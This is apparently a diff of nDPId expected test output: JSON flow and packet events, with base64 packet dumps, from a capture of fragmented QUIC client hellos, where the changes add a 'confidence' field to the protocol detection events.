 00626{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431465588,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431465588,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431465588,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431355629,"flow_last_seen":1621431355629,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431465588,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":51456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431465588,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1621431465588,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431465588,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFOJAAH4RYRqokEAFgPgYAeyHAbsFTuuvwP8AAB0IU7\/qR9hybwkANwBhzZIZzXuLO+ITUxwPQ154KDm4YAA5umLfVFm+RmcLUYDlEBA\/pAz6nvB8AVSCdTXI5TOYsV9E\/QWBFKCDCIBHTHvFyIcz+i9HnhzJx3oomex6fz89Wv0t4v5XCsZ2gtXaLihep1Q6RHSn816q6Kh40Jb6q21pIvxBT+cRUyfL9XQqtwbCmih\/1k+KHNhNh+kRFh6XJbGZqdVuNiBplHu6zJ0pkshr1pvC1LJhyvQU0Dm4mWPTqJuQqwLB7hjY60vKpAGHvyyOczQWN09erIQDzXbzqMhL4b0M2w1\/TlT7huuQTxEID3j5k9KaYjz6kf0ER1JcH8cEnZSpU6ZDcA0aKtSUCRbfGucvzpXAlU1P0gD13ZbHqKxSYrqnpXGcTVwS3I9+c5Q\/VkUgvsZc0wf\/9MEOjlcithT92XYA7xmlU0UfwPd4Ojf1wNxPgSU\/K0DnDk1womS0G\/ZSh9D9ZlZVB5yVA13pIiaR+k8r1X82fdroTGzdHugbU8o3fbaRyQm8b4yRtnFzF0LxEo7PtOJzdm0ZBLoje+ZNNqh9NFtJ9V1qQS1X9VNOsUZvWPNgQBaeyZndWXpgl15MvPmte+qN9awZ8E\/Y3bjdMYO04PR3TnIuFN08oA49CYA1VctJp7\/dE8aTfiUzEHQg2lRh\/vprMm4FsAuocyWHNetPgpGS\/nW\/ajz3nUWrWpr4p5iU3XvWC1ReAGuIIwesUqSmu427nLGiB1ay7OxzNWba7FJKEY4XyQMczhEntYCEKh4B2jDrKe9HHMi65qX0Oh6pF0JJHBGwEfsMrAVsySYaPZfJk7O3QMH6jwaf2H8zG51QPhsVfJebD1eM82cCAiKz3k4AxeP1Mp2XyoYtWJntK6nrkhq29ZSo8N9IF25Bx4cyZQ1gWgsf6YOucgt1DYomgaAz5sN1VRPs3lKuTuJk+9CmvbZws8Lrl5pNQluKA7HS6J5r6Sdko6sMJa32MLYdskh\/eWjyAO4PIU0DLNnI9urDc90Tl7DeKVFUDKd5Ccw06SjbQZXaBeFclUY6Rq7ktvqS4xNkU42wPXNNkc+Km0VcpWL5mTb8raM3lJS9QkTtvIQ+D3CxIQKxNN71qsRBMGUoIaCSVO44MLEyhaXL++UAl6veMNbMWNzpyGl2ZAQaiMg3gh88e\/KjyFDhVelq57ttuwxfYY4HdAvf1O7Wm2niYjEYy3EGd+XJh75LEv2J7OvkX\/TDKMoDPHZBKylGhceTFClV6SwJCqHbmFRPRljZRudE8DcvLMdi2ArGtC7wV6BJuPxvznknqIpsuPaaUACqFh132DMk+VymlGGrHAEvcCDBXHcv+s986i6aYzFj3+UG25eWMpILHj80J8I1qvmexhdgAH0\/xq6OcVC+CWTvOrw2ojyebhvuLWQwJTRfXumFCZVnkVXMY\/wBcky+Zey4VYpd2tteRlcYmo0gstMZmuJQkyXGMQDd6DmMt+xSCBKdq2pU3+cJZWcSDy+PS90fcIm9NFtg1W76+\/3yU3UvgIkGb2htcHHuLcboGe6WFdcvOvn66fYN1q99qa+mvjvMLlrlsqtu4oszePWHk3JUyZ0uzuBriY6ZOViLOu9+ngcuDNQPDEI8BMfCUASLWFyzVNOtTnOzlD21\/UqlSPBUT+FMnLB8yDq8q7wJuDMTSdqKQ5\/2g+\/gT1sPzVcQn8bdHpPg21YclHOSozdRTvS2OQZHZHwOsQ3Q8D0cWDoLqYrm7VvgO2SJgZmoD+0O+6Mg5gIxvYEyW63O7uwaFAXSn6cSWSij"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431465588,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431465588,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -94,10 +94,10 @@
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431482942,"flow_last_seen":1621431482942,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"177.86.46.206","src_port":56488,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1621431482942,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431482942,"pkt":"AAAAAAAAAAEATej1CABFAAVioMVAAH4RjguokEAFsVYuztyoAbsFTmeUz\/8AAB0IyBHAZ\/KzP6sANwD5gA3If0Iup4ZIgtnchwt9ocBVPoi0jazUzZX7baSHnp2+ZpfaMjYJtsimLMd7snuHAP5qKMdE\/QlWzMm9QjekYI5DKIp3Vs2bgEYSzsPRJHJKk+aezBC58a0+UE3a4VvidK0X7rVv7FFtJ\/MlZ0l7eyLpQagPrjcoOKGABkLRMC8f8c7JiV+3vMxbVMzswL0F0LHGpOF6tJmgxxG3+uIP4la3w9aqL9EIveC4NT3J3l\/d0v30cvaNQdKp9qrKAtUZ3b8p5FSbz95HiJcYx1aCRH8HEjdQWEZtyOX1SVZcoQkIfAis2hQqjHVzbGHJilsHstK+d\/yh1vND+cvzFLHGQ69Qa22CEae79RChQnTrK2ZCkxDnMfq1REzR81Vvo7\/ll3OtbcsHwGPv90oLgV5z+gQBcGSsn+txIgajW5\/OHfM0j4G0dOYCsFP1nOlqm4KZEyRojk5FD9gkh+QOWzUWMY5A1pCDVEbH98Ij7MdFXOII4eyOGrKjZzB3mOY4L3c23aLspNnA\/xDDGoLwBtxo8tuS0zMN0N7GirfEc+UfpigoL4GN63\/LWtTXGeRupY0hNf1HQSb5VrjXblNspzeSPkwLA3aJ5esrWE6xSGdL6JZ5WypP8xT64XLmr0Zb60RDfQA5rRVy5Slfvqsy9gpQwpIPi8FWy85za9+wqZmlViFlX2epvHU\/FjVYv3WNuP8SbX3Uhu84jX8xNIyRWWdBxFeFE\/86cZtOr\/Y3X4PqG7sr0JWY\/fMaNEX7\/wyGWZ4GThmJ5+cXL+EYkRu6GhEEZrNAi+9kCVttLBMUDHxs8XD83alhSam2NBHXrH3qgMFg4wem33ZjfiDKFbwU8lzTj0R5jphur9\/TMii0ZE4o\/tWuxXum9FphC9lsiHff\/LoE+tpkkEGSJvfUkY+42PUd+iyulKfdSSlb2w3ICSW982gZX8yqFnIWdMtFMt7VtGfDY6b2g\/VctCi7tH4bfPeCfOSltFtkJj87\/U\/kUi9e1b26oCdt5Xk6wLRo21LJgccFK7EgeSfdK8uEGdrc\/u9CQqoxHZNC0NFUmmKcp\/1jZCF0P3DcN0ewbtKhnRxAjSNjtkYP74ShEvo3ktBV+nVpNskRYreit0gbPCwlbV4PLZXs3NS2DwC1zjsxp6Hv+nM3Q3t+CbogIe1A48l1yD1WlnX7Siynac+mrBcCDB7xdiQozuRnqhIinTfzuyAJM7Da8bFtM4zKsUHWfXAlicU5hdqlIJ6QkyRLm3x+ut5L5m62Q2VfTWbqDNHIYAnHPUo+TuglzAH0cDKH4SYvskX8XBUvmGvLHZZLJKUBhOxd87nESRICfrgx6G3GmLH92u34bDky8P6str3vYXizffmDVn1fnpnNyetYdgDy1+qT4TCFCyOkA8eJxH04nS1cwuyXOClUl4xACm9FU4jJJg92Pyie1LF9nZIEvD+s8U296VtKerW0URPmgRjvHP723Xg+xd+1t2dLLFXB6dee9it85SO3nA37lV1L1ODC1xoDUthLzBuJjMX32C9IytuXhyyPcrHeaPjq4gDH3rx9QhfkdaaErk1SnrXw0GjVVxKPC1H0G8BIzVuCJzL6ifqHzHtQpmqGWkB1dkKDilpNyCRwBtJL1lOHBAp\/WGH4+IC4wpPGe9o5k38RrL8SgNobFDQ7d4KUVI\/R6UNBDzFLkmCpffORWC9LBKt3SKQtPDoJw4\/zzDEridhd8NKA22XDC0i6N8sevkZDtKuiWYpfGInjxye\/dACo5mlltAELaIWcGHUxsmgi"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431482942,"flow_last_seen":1621431482942,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"177.86.46.206","src_port":56488,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431482942,"flow_last_seen":1621431482942,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"177.86.46.206","src_port":56488,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431520499,"flow_last_seen":1621431520499,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":49153,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02295{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1621431520499,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431520499,"pkt":"AAAAAAAAAAEAU0VlCABFAAViMyFAAH4RJiSokEAFmWIcTsABAbsFToP3zf8AAB0I8UfMm0YCumkAAEU0qB108owToXTtuCRjc+70inAihifYHiWbQuXfJea7VaHoD1Z3r4\/vBhoSdhxMdibKvoSajiWd+GKpZIpSe6Mu3b02WuJTQZ7lIlxB6R8387TPpWvfdvZCcexYSs5w06Q1KSKSldCKb13732QiDhmceyuJ+G\/vOPKCn4lhROVQeWtYaKBdyapYqZHfhjZWjljHpjVo2vNz+VkBflOX+Ozm6T\/87Vc5UeUm3B37gfSZ4LeIx7NevaSMxGXLmBBGm53OH67qMQ24dCiLmx1nIEP2GSXUuuxzvdiYJ+C33xdZKaEr6jhIjm7VN1\/Zu8CjfkKQf7D8e9dFZtoH9YVFCLq08e8yFNdGIgBhWD1FTAmwmExuDbbN8chYJX2X\/1hfjPMXADpNHptZq24MTx4Ub2WVKMWLSPtjykME1uGVH48mFoWytx02J11gW\/ap3AsmyZ9NdEW7Cunzb7OdwAsLm5eBcsvVYsBASXkXW3J41zJ4fFwc7gDX94tPUT2MihCUm3spqjn8qePvRLkJUMDo\/SAAm5dZcaQtVMRqKRQyJK3obHEqKv8SvkNiEUp6IvmaXKJzaHAMKbNjzuPBN5APMlSrVhrdjOoWnxltOAScvKXxSntCksumIK1eZRzMyHmhY2Zkz\/cbLMG+nbi739ExhDy7kfNZcN1w7DL8T3NA2lau5y0gmwx2J+etKbkof1MTLgLIWQjaMgJ3Yg5iRbSia+X7UmijUvf0oRg1VUpzVMKvybapDiUxy7TKrPFHlmnAdWt7EbvCGo4ZOvDt9jNsJ3ry3qsfnRRTY0KCXoq9KBhKDVmNwRT0CfKMZF9UZyQR8waEK3M2khCNE8K0HtopUIBaei2pkSAkP0cWMAQzYQoAL9RPKGIb2zxA2FTLXUCeYjqOz5YFjo\/YUbPspSIkamI5Uqoz3HxLcyaZT1IlDi3snj703Pl1raa5uPYB9SbeFS3jz22i+jMB1jK64ocdk\/Ap04WGAZSylA0JvWsYxDreLK4icj5p\/lle+733epQE+WSvjvH3tpEFuFmbvfaXn1HUnxAw3Znts4em7rmRTGyYtwIh8Xo3qzYWxNp\/\/277cZjRt9QzcMt6pSHqe\/yM04MKoyEXtKFSOMDWukBJqjkH4ISeeqHmQ0D2O3e10r1RYA0qfHiQCpBrjUzeDJ5xQe6BIM9EKqojRuTs\/9mFZHxEdvsWM0nr40pxU4fyO6RlV7bvX6gjlu6xDeyImfTBJ1CrhxkM0NIOLgBByqIu1vkvl+ToqkPCKb8lpAmBCSOuL8LVtqnQvcqcllj+MkGi4em4vqlh9wF35mSy9bZRKUfyGp+cvVqboEHj5rnD\/784KqHiRDHIGgaFgNoSsGakObjU1Rp9zwOiAfj+k7Rb9uzcZoWDO5B2gL8j4OXSBSVhkAirs3N86IOumv\/3IoeWBTvvkpNELfLJuEh70vkySKCdBxM0hwVEaMSCru3BXwqtfPMH1QJ4jHNqxDAuEHki1cwAcJhlCh9Wp3ET7xqPW7AeUxwE9fN3Jod8qufi8Ujiy3wnc8\/qOYbxiPpALR0F1dCk1cwWv9kpGmhEZ6eBwn6kYxBWDq0P1zZ7tjZHsfRLSAnN8M937kF16B4WONO3kFuMiJaE8dalwqulOnHsnWLkMT4dr795Qeky6SKp5+YFHGV+5ALzCSXCENO4JxTGck3fzNG3n\/Cx2j6bb0QI1wP3YfxO0Zb0Z81wO59qyyo3YabxIs6ynT60zY7ne50FIpDZulJ5HZlhqxpkr0W\/k06atJOkV0Ej"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431520499,"flow_last_seen":1621431520499,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":49153,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431520499,"flow_last_seen":1621431520499,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":49153,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -107,7 +107,7 @@
 00626{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431576853,"flow_last_seen":1621431576853,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431576853,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":51296,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1621431576853,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431576853,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFQlAAH4RYPOokEAFgPgYAchgAbsFTnq0wv8AAB0IQJ4IpSc1aNIANwCZc\/3f1l3vg6YZeTNl87IqhJ27nCcuea\/qvb41mLVKUuBIV5pQThWzegD9xWcQRyZSfI7h79NE\/YUm1oAXrFrCT3TkbHGJwP3KBfTu3orp0WCwk0l4MiqV0DClWwpW\/1NKhCfuNkry0QNEwg5pHZb\/vSK\/s\/a8cF3aIAtN637iUzqyfqlQEpk\/TZCqI5tarhaQzSJ4uSDtYWWFCyQdGrPQxx36Ty1apquBRh7LpqS3HzTGXWn1iXBjJTo2oNMvvW5LV8Ozlo+ykFGxJKjaz+YxvcqhT3PapUN200W+09yqn+UXzRAxphjhSHCFmnFGaD1Cmd2AoqB2RODbBdfTfnO0p+5IwFP+QXYCSCui22wiXW71huSyPhBNTXtdjBnB0aI7RQe9BP\/8cTXCHdvaiOWZbEqGPCEZpsonT5okRzLwKKitPO9lmE6w6XZFQF+AwHMppJIEs+V4\/+utYSZGmsenl8sXZa5i3PEJK+hPz90wGXsjo2vNoA9zBeskKRP31j+JnkVWm6+SeE\/XRpijNighimBNH4TAc1SkFEUDYnbj8\/dvi6K8\/bLnWnO5ZEd5IeQ8y49ijX2T\/6gXriwCkzq1N2nFeCTG9C25WLUIBOWbIgjk\/+rRxff3yEw3Cf0EsWpP57l3vuNRPUUM9k6QGTA+VA1VqhI5cq5zqw3USveM+coEGcG1czX5cJsPCLcDVcPmIyqMPFVLeTlqZ1e993EuXFPOAn7\/j9tmZpD0F7W3EcJhPNBgFb8I9AuIGuTFhDSHGIm1+udcX3QtCfqh23mMSbz03kWO\/8Pc52Aj8EV9FAJ++uk6cpcxlqReXfPX+orcIqI07HBHS4wZHhfWa4II0L8ZmZqChXEQh4SRM5QraEDhiDgHu2Wr\/XrZ+LTSmy6GJnpyoczRJsxWL+SqSeaD+rxyEDOOHfzLTMkqwLlJdA5\/bX9M6EkuaQ7fp6odWxiaULg9HlTuvy4eSg1Y+BunaS6DHxROL7RTUmCWNUYbZhsn7mUOPPTqltAXc+wYwHbtEmsu3lqjKjPQEUq39uJ2DkvHyNGNu15OR5jgmIUl9ra0cSZwJSuq26MGcArS+trbqUaRVMldH30c\/MqtoFc0+kTZkdf2zXVOuhlhIHDu5oivOacupqIMRXqQvnAj9e3Szh7HtmF\/ZTqRfgMooySSCala0vsE5E7aOt7Q